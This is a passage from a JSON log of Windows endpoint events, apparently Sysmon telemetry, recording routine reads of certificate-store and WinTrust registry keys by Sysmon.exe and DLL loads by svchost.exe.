"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - 
"process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880900000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": 
"C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "StateRepository.Core.dll", - "image_path": "C:\\Windows\\System32\\StateRepository.Core.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570878860000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570880900000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", 
- "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881050000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "Windows.Storage.OneCore.dll", - "image_path": "C:\\Windows\\System32\\Windows.Storage.OneCore.dll", - "pid": 3980, - "process_name": "svchost.exe", - "process_path": "C:\\Windows\\System32\\svchost.exe", - "timestamp": 131883570879020000, - "unique_pid": "{42FC7E13-CADF-5C05-0000-0010F0A84D01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883570881050000, - 
"unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - 
"registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883570881050000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - 
"registry_value": "CTLs", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883570881050000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 